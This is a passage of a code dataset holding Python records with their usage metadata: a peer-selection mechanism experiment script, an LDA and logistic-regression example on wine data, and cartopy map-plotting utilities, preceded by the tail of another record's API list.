{"api_name": "utils.shp.SQliteToShp", "line_number": 250, "usage_type": "call"}, {"api_name": "utils.shp", "line_number": 250, "usage_type": "name"}, {"api_name": "utils.kml.SQliteToKml", "line_number": 269, "usage_type": "call"}, {"api_name": "utils.kml", "line_number": 269, "usage_type": "name"}, {"api_name": "django.conf.settings.OSMAND_MAP_CREATOR_DIR", "line_number": 286, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 286, "usage_type": "name"}, {"api_name": "utils.osmand.OSMToOBF", "line_number": 289, "usage_type": "call"}, {"api_name": "utils.osmand", "line_number": 289, "usage_type": "name"}, {"api_name": "shutil.move", "line_number": 294, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 295, "usage_type": "call"}, {"api_name": "django.conf.settings.GARMIN_CONFIG", "line_number": 335, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 335, "usage_type": "name"}, {"api_name": "utils.garmin.OSMToIMG", "line_number": 338, "usage_type": "call"}, {"api_name": "utils.garmin", "line_number": 338, "usage_type": "name"}, {"api_name": "shutil.move", "line_number": 345, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 346, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects.get", "line_number": 364, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects", "line_number": 364, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportRun", "line_number": 364, "usage_type": "name"}, {"api_name": "jobs.presets.TagParser", "line_number": 372, "usage_type": "call"}, {"api_name": "django.core.files.base.ContentFile", "line_number": 374, "usage_type": "call"}, {"api_name": "jobs.models.ExportConfig.objects.create", "line_number": 378, "usage_type": "call"}, {"api_name": "jobs.models.ExportConfig.objects", "line_number": 378, "usage_type": "attribute"}, {"api_name": "jobs.models.ExportConfig", "line_number": 378, "usage_type": "name"}, {"api_name": "celery.Task", "line_number": 391, "usage_type": "name"}, {"api_name": "tasks.models.ExportRun.objects.get", "line_number": 404, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects", "line_number": 404, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportRun", "line_number": 404, "usage_type": "name"}, {"api_name": "tasks.models", "line_number": 406, "usage_type": "name"}, {"api_name": "tasks.models", "line_number": 408, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 411, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 411, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 415, "usage_type": "call"}, {"api_name": "django.conf.settings.HOSTNAME", "line_number": 420, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 420, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 430, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 430, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 431, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 431, "usage_type": "call"}, {"api_name": "django.core.mail.EmailMultiAlternatives", "line_number": 432, "usage_type": "call"}, {"api_name": "celery.Task", "line_number": 437, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 446, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 446, "usage_type": "name"}, {"api_name": "tasks.models.ExportRun.objects.get", "line_number": 447, "usage_type": "call"}, {"api_name": "tasks.models.ExportRun.objects", "line_number": 447, "usage_type": "attribute"}, {"api_name": "tasks.models.ExportRun", "line_number": 447, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 452, "usage_type": "call"}, {"api_name": "os.path", "line_number": 452, "usage_type": "attribute"}, {"api_name": "django.conf.settings.HOSTNAME", "line_number": 458, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 458, "usage_type": "name"}, {"api_name": "django.conf.settings.TASK_ERROR_EMAIL", "line_number": 463, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 463, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 469, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 469, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 470, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 470, "usage_type": "call"}, {"api_name": "django.core.mail.EmailMultiAlternatives", "line_number": 471, "usage_type": "call"}]}
+{"seq_id": "357491099", "text": "'''\n File: stepping_exp.py\n Author: Nicholas Mattei (nsmattei@gmail.com)\n Date: July 30th, 2015\n\n * Copyright (c) 2015, Nicholas Mattei and NICTA\n * All rights reserved.\n *\n * Developed by: Nicholas Mattei\n * NICTA\n * http://www.nickmattei.net\n * http://www.preflib.org\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions are met:\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n * * Neither the name of NICTA nor the\n * names of its contributors may be used to endorse or promote products\n * derived from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY NICTA ''AS IS'' AND ANY\n * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n * DISCLAIMED. IN NO EVENT SHALL NICTA BE LIABLE FOR ANY\n * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \n \n\nAbout\n--------------------\n This runs a simple stepping experiment and saves the results to a file.\n Note that it DOES NOT TRACK the score vector etc. This is meant \n as a way to run a series of steps -- not a comprehensive experimental framework.\n \n'''\nimport pickle\nimport numpy as np\nimport random\nimport itertools\nimport pandas as pd\nfrom collections import Counter\n\n_DEBUG = False\n\nfrom peerselect import impartial\nfrom peerselect import profile_generator\n\n# Set the Seed...\n# random.seed(15)\n\nclass Impartial:\n VANILLA = \"Vanilla\"\n PARTITION = \"Partition\"\n DOLLAR = \"DollarPartition\"\n DPR = \"DollarPartitionRaffle\"\n CREDIABLE = \"CredibleSubset\"\n RAFFLE = \"DollarRaffle\"\n ALL = (VANILLA, DOLLAR, PARTITION, RAFFLE, CREDIABLE, DPR)\n\n\n# Exponential.\n#scores = [pow(n, 4), pow(n, 3), pow(n, 2), n, 1]\n#dist = [0.1, 0.2, 0.2, 0.2, 0.3]\n\n#Borda\n#scores = [3, 2, 1, 0]\n#dist = [0.25, 0.25, 0.25, 0.25]\n\n# Psuedo 10 point Normal... \\sigma~=1\nscores = [8, 7, 6, 5, 4, 3, 2, 1, 0]\n# Normal...\ndist = [0.03, 0.05, 0.12, 0.15, 0.30, 0.15, 0.12, 0.05, 0.03]\n\ns = 1000\ntest_n = [130]\ntest_k = [25]\ntest_m = [10, 20, 40]\ntest_l = [5]\ntest_p = [0.1]\n\n# Output File name\n## Save the current runs\nout_name = \"../notebooks/pickled_runs/pub_NSF1000s_130n_25k_10-40m_5l.pickle\"\n\n# Map for all results... We'll build a high level index out of this later...\nresults = {}\nfor n,k,m,l,p in itertools.product(test_n, test_k, test_m, test_l, test_p):\n \n # Compute some artifacts from the scoring distributions.\n agents = np.arange(0, n)\n \n #Bit Hacky but faster.... Generate a unanimous score matrix and compute some properties..\n t_profile = profile_generator.generate_mallows_mixture_profile(agents, agents, [1.0], [agents], [0.0])\n t_matrix = profile_generator.profile_classes_to_score_matrix(t_profile, scores, dist)\n \n #Determine how many of each bin we have.\n # Compute the binning from The SCORE MATRIX ---> Tally guy 0.\n t = Counter(list(t_matrix[:,0]))\n size = [t[k] for k in sorted(t.keys(), reverse=True)]\n # Determine how many of each bin we should have...\n n_from_bin = [0]*len(size)\n left = k\n for i,j in enumerate(n_from_bin):\n if left > 0: n_from_bin[i] = min(size[i], left)\n left -= size[i]\n cum_n_from_bin = list(np.cumsum(n_from_bin))\n \n # Determine what bin they should go in according to the ground truth.\n # Just take the first guys's vector and iterate over it.\n # Guy i got score v and should be in the corresponding bin as indexed by the score vector.\n in_bin = {i:scores.index(v) for i,v in enumerate(list(t_matrix[:, 0]))}\n \n # Containers for Results\n count_results = {x:[0]*k for x in Impartial.ALL}\n bin_results = {x:[0]*len(size) for x in Impartial.ALL}\n for c_sample in range(s):\n #Generate a full profile and a clustering.\n profile = profile_generator.generate_mallows_mixture_profile(agents, agents, [1.0], [agents], [p])\n clustering = impartial.even_partition_order(sorted(agents, key=lambda j: random.random()), l)\n\n #Generate an approx-m-regular assignment.\n m_assignment = profile_generator.generate_approx_m_regular_assignment(agents, m, clustering, randomize=True)\n score_matrix = profile_generator.profile_classes_to_score_matrix(profile, scores, dist)\n score_matrix = profile_generator.restrict_score_matrix(score_matrix, m_assignment)\n\n #Compute Target Set.\n target_set = impartial.vanilla(score_matrix, k)\n\n ws = {}\n ws[Impartial.DOLLAR] = impartial.dollar_partition_explicit(score_matrix, k, clustering, normalize=True)\n size_ws = len(ws[Impartial.DOLLAR])\n # Let everyone else have the same size set so they are all compareable.\n ws[Impartial.VANILLA] = [i for i,j in impartial.vanilla(score_matrix, size_ws)]\n # Let CRED, PART, and RAFFLE have bigger sets...\n ws[Impartial.PARTITION] = impartial.partition_explicit(score_matrix, size_ws, clustering, normalize=False)\n ws[Impartial.CREDIABLE] = impartial.credible_subset(score_matrix, size_ws, m, normalize=False)\n ws[Impartial.DPR] = impartial.dollar_raffle_explicit(score_matrix, size_ws, clustering, normalize=True)\n #Call Raffle and have everyone in a cluster by themselves = Dollar.\n ws[Impartial.RAFFLE] = impartial.dollar_raffle(score_matrix, size_ws, n, randomize=True, normalize=True)\n \n # Update the Per position information.\n for i,tup in enumerate(target_set):\n a = tup[0]\n for x in Impartial.ALL:\n if a in ws[x]: count_results[x][i] += 1\n \n # Update the per bin picking for each type.\n for x in Impartial.ALL:\n for e in ws[x]:\n bin_results[x][in_bin[e]] += 1\n \n # Make cumulative versions for easy graphing...\n cum_count_results = {x:[0]*k for x in Impartial.ALL}\n cum_bin_results = {x:[0]*len(size) for x in Impartial.ALL}\n for x in Impartial.ALL:\n cum_count_results[x] = [v/float((i+1.) * s) for i,v in enumerate(list(np.cumsum(count_results[x])))] \n cum_bin_results[x] = [v/float(cum_n_from_bin[i] * s) for i,v in enumerate(np.cumsum(bin_results[x]))]\n # Normalize the counts and bins by n Samples to get a rate.\n count_results[x] = [float(i) / float(s) for i in count_results[x]]\n bin_results[x] = [float(i) / float(s) for i in bin_results[x]]\n \n # This should likely be some kind of multiindex but I can't figure it out.\n t = (n, k, m, l, p, \"count\")\n results[t] = pd.DataFrame(count_results)\n results[t].index += 1\n t = (n, k, m, l, p, \"cum_count\")\n results[t] = pd.DataFrame(cum_count_results)\n results[t].index += 1\n t = (n, k, m, l, p, \"bin\")\n results[t] = pd.DataFrame(bin_results)\n results[t].index += 1\n t = (n, k, m, l, p, \"cum_bin\")\n results[t] = pd.DataFrame(cum_bin_results)\n results[t].index += 1\n print(\"Finished: \" + \",\".join([str(x) for x in [n, k, m, l, p]]))\n\n## Save the current runs\nwith open(out_name, 'wb') as output_file:\n pickle.dump(results, output_file)\n\nprint(\"Done\")\nprint(\"Wrote to: \" + out_name)\nprint(\"Score: \" + str(scores))\nprint(\"Distribution: \" + str(dist))\nprint(\"Size: \" + str(size))\n", "sub_path": "peerselect/experiments/stepping_exp.py", "file_name": "stepping_exp.py", "file_ext": "py", "file_size_in_byte": 8098, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "itertools.product", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 98, "usage_type": "call"}, {"api_name": "peerselect.profile_generator.generate_mallows_mixture_profile", "line_number": 101, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 101, "usage_type": "name"}, {"api_name": "peerselect.profile_generator.profile_classes_to_score_matrix", "line_number": 102, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 102, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 114, "usage_type": "call"}, {"api_name": "peerselect.profile_generator.generate_mallows_mixture_profile", "line_number": 126, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 126, "usage_type": "name"}, {"api_name": "peerselect.impartial.even_partition_order", "line_number": 127, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 127, "usage_type": "name"}, {"api_name": "random.random", "line_number": 127, "usage_type": "call"}, {"api_name": "peerselect.profile_generator.generate_approx_m_regular_assignment", "line_number": 130, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 130, "usage_type": "name"}, {"api_name": "peerselect.profile_generator.profile_classes_to_score_matrix", "line_number": 131, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 131, "usage_type": "name"}, {"api_name": "peerselect.profile_generator.restrict_score_matrix", "line_number": 132, "usage_type": "call"}, {"api_name": "peerselect.profile_generator", "line_number": 132, "usage_type": "name"}, {"api_name": "peerselect.impartial.vanilla", "line_number": 135, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 135, "usage_type": "name"}, {"api_name": "peerselect.impartial.dollar_partition_explicit", "line_number": 138, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 138, "usage_type": "name"}, {"api_name": "peerselect.impartial.vanilla", "line_number": 141, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 141, "usage_type": "name"}, {"api_name": "peerselect.impartial.partition_explicit", "line_number": 143, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 143, "usage_type": "name"}, {"api_name": "peerselect.impartial.credible_subset", "line_number": 144, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 144, "usage_type": "name"}, {"api_name": "peerselect.impartial.dollar_raffle_explicit", "line_number": 145, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 145, "usage_type": "name"}, {"api_name": "peerselect.impartial.dollar_raffle", "line_number": 147, "usage_type": "call"}, {"api_name": "peerselect.impartial", "line_number": 147, "usage_type": "name"}, {"api_name": "numpy.cumsum", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 165, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 172, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 178, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 181, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 187, "usage_type": "call"}]}
+{"seq_id": "16066853", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n2021.09.18\nauthor: yasin sahin\nwritten to construct lda algorithm together with logistic regression\n\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import confusion_matrix, accuracy_score\n\n# importing dataset\ndataset = pd.read_csv('Wine.csv')\nx = dataset.iloc[:,:-1].values\ny = dataset.iloc[:,-1].values\n\n# splitting training and test set\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size = 0.2, random_state = 0)\n\n# Scaling independent variables\nsc_x = StandardScaler()\nx_train = sc_x.fit_transform(x_train)\nx_test = sc_x.transform(x_test)\n\n# applying PCA and reducing dimension to two\nlda = LinearDiscriminantAnalysis(n_components = 2) # initiliazing pca instant\nx_train = lda.fit_transform(x_train, y_train)\nx_test = lda.transform(x_test)\n\n# fitting logistic regression classification model to dataset\nclassifier = LogisticRegression(random_state = 0)\nclassifier.fit(x_train, y_train)\n\n# predicting test set results and calculating confusion matrix and accuracy\ny_pred = classifier.predict(x_test)\nc_m = confusion_matrix(y_test, y_pred)\naccuracy = accuracy_score(y_test, y_pred)\nprint(f'Accuracy is: {accuracy}')\n\n\n# visualizing training results\nx_set, y_set = x_train, y_train\nx_1, x_2 = np.meshgrid(np.arange(start = x_set[:,0].min() - 1, stop = x_set[:,0].max() + 1, step = 0.01), \\\n np.arange(start = x_set[:,1].min() - 1, stop = x_set[:,1].max() + 1, step = 0.01))\n\nplt.contourf(x_1, x_2, classifier.predict(np.array([x_1.ravel(),x_2.ravel()]).T).reshape(x_1.shape), alpha = 0.75, cmap = ListedColormap(('red','green','blue')))\nplt.xlim(x_1.min(),x_1.max())\nplt.ylim(x_2.min(),x_2.max())\nfor i,j in enumerate(np.unique(y_set)):\n plt.scatter(x_set[y_set==j,0],x_set[y_set==j,1], c = ListedColormap(('red','green','blue'))(i), label =j)\nplt.title('Logistic Regression (training results)')\nplt.xlabel('LD1')\nplt.ylabel('LD2')\nplt.legend()\nplt.show()\n\n\n\n# visualizing test results\nx_set, y_set = x_test, y_test\nx_1, x_2 = np.meshgrid(np.arange(start = x_set[:,0].min() - 1, stop = x_set[:,0].max() + 1, step = 0.01), \\\n np.arange(start = x_set[:,1].min() - 1, stop = x_set[:,1].max() + 1, step = 0.01))\n\nplt.contourf(x_1, x_2, classifier.predict(np.array([x_1.ravel(),x_2.ravel()]).T).reshape(x_1.shape), alpha = 0.75, cmap = ListedColormap(('red','green','blue')))\nplt.xlim(x_1.min(),x_1.max())\nplt.ylim(x_2.min(),x_2.max())\nfor i,j in enumerate(np.unique(y_set)):\n plt.scatter(x_set[y_set==j,0],x_set[y_set==j,1], c = ListedColormap(('red','green','blue'))(i), label =j)\nplt.title('Logistic Regression (test results)')\nplt.xlabel('LD1')\nplt.ylabel('LD2')\nplt.legend()\nplt.show()\n", "sub_path": "coding/part9_dimensionality_reduction/lda/lda.py", "file_name": "lda.py", "file_ext": "py", "file_size_in_byte": 3022, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.discriminant_analysis.LinearDiscriminantAnalysis", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 39, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}]}
+{"seq_id": "321422704", "text": "\"\"\"Inspiration:\nhttps://github.com/tommylees112/esowc_notes/blob/master/src/plotting_utils.py\n\"\"\"\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport shapely\n\nfrom scipy import stats\nfrom scipy.stats import pearsonr\n\nimport matplotlib.pyplot as plt\n\nimport cartopy\nfrom cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\n\ndef plot_xarray_on_globe(da, borders=True, coastlines=True, **kwargs):\n \"\"\" Plot the LOCATION of an xarray object \"\"\"\n # get the center points for the maps\n mid_lat = np.mean(da.lat.values)\n mid_lon = np.mean(da.lon.values)\n # create the base layer\n fig = plt.figure(figsize=(12, 8))\n ax = fig.add_subplot(1, 1, 1, projection=cartopy.crs.Orthographic(mid_lon, mid_lat))\n # ax = plt.axes(projection=cartopy.crs.Orthographic(mid_lon, mid_lat))\n\n vmin = kwargs.pop(\"vmin\", None)\n vmax = kwargs.pop(\"vmax\", None)\n cmap = kwargs.pop(\"cmap\", None)\n da.plot(ax=ax, transform=cartopy.crs.PlateCarree(), vmin=vmin, vmax=vmax, cmap=cmap)\n\n ax.coastlines()\n ax.add_feature(cartopy.feature.BORDERS, linestyle=\":\")\n ax.add_feature(cartopy.feature.LAKES, facecolor=None)\n fig = plt.gcf()\n ax.outline_patch.set_visible(False)\n return fig, ax\n\n\ndef plot_xarray_on_map(da, borders=True, coastlines=True, **kwargs):\n \"\"\" Plot the LOCATION of an xarray object \"\"\"\n\n # create the base layer\n fig = plt.figure(figsize=(12, 8))\n ax = fig.add_subplot(1, 1, 1, projection=cartopy.crs.Robinson())\n # ax = plt.axes(projection=cartopy.crs.Orthographic(mid_lon, mid_lat))\n\n vmin = kwargs.pop(\"vmin\", None)\n vmax = kwargs.pop(\"vmax\", None)\n cmap = kwargs.pop(\"cmap\", None)\n robust = kwargs.pop(\"robust\", None)\n da.plot(\n ax=ax,\n transform=cartopy.crs.PlateCarree(),\n vmin=vmin,\n vmax=vmax,\n cmap=cmap,\n robust=robust,\n cbar_kwargs={\"shrink\": 0.4},\n )\n\n ax.coastlines()\n ax.add_feature(cartopy.feature.BORDERS, linestyle=\":\")\n ax.add_feature(cartopy.feature.LAKES, facecolor=None)\n fig = plt.gcf()\n ax.outline_patch.set_visible(False)\n return fig, ax\n\n\ndef add_point_location_to_map(point, ax, color=(0, 0, 0, 1), **kwargs):\n \"\"\" \"\"\"\n assert isinstance(\n point, shapely.geometry.point.Point\n ), f\"point should be of type shapely.geometry.point.Point. Currently: {type(point)}\"\n # assert isinstance(ax, cartopy.mpl.geoaxes.GeoAxesSubplot), f\"Axes need to be cartopy.mpl.geoaxes.GeoAxesSubplot. Currently: {type(ax)}\"\n ax.scatter(\n point.x, point.y, transform=cartopy.crs.PlateCarree(), c=[color], **kwargs\n )\n\n return\n\n\ndef add_points_to_map(ax, geodf, point_colors=\"#0037ff\"):\n \"\"\" Add the point data stored in `geodf.geometry` as points to ax\n Arguments:\n ---------\n : geodf (geopandas.GeoDataFrame)\n gpd.GeoDataFrame with a `geometry` column containing shapely.Point geoms\n : ax (cartopy.mpl.geoaxes.GeoAxesSubplot)\n \"\"\"\n assert isinstance(\n ax, cartopy.mpl.geoaxes.GeoAxesSubplot\n ), f\"Axes need to be cartopy.mpl.geoaxes.GeoAxesSubplot. Currently: {type(ax)}\"\n points = geodf.geometry.values\n\n # [add_point_location_to_map(point, ax, color=\"0037ff\") for point in points]\n ax.scatter(\n [point.x for point in points],\n [point.y for point in points],\n transform=cartopy.crs.PlateCarree(),\n color=point_colors,\n )\n\n return ax\n", "sub_path": "esdc/visualize.py", "file_name": "visualize.py", "file_ext": "py", "file_size_in_byte": 3494, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.mean", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "cartopy.crs.Orthographic", "line_number": 28, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 34, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cartopy.feature", "line_number": 37, "usage_type": "attribute"}, {"api_name": "cartopy.feature", "line_number": 38, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "cartopy.crs.Robinson", "line_number": 49, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 58, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 58, "usage_type": "attribute"}, {"api_name": "cartopy.feature", "line_number": 67, "usage_type": "attribute"}, {"api_name": "cartopy.feature", "line_number": 68, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "shapely.geometry", "line_number": 77, "usage_type": "attribute"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 81, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 81, "usage_type": "attribute"}, {"api_name": "cartopy.mpl", "line_number": 96, "usage_type": "attribute"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 104, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 104, "usage_type": "attribute"}]}
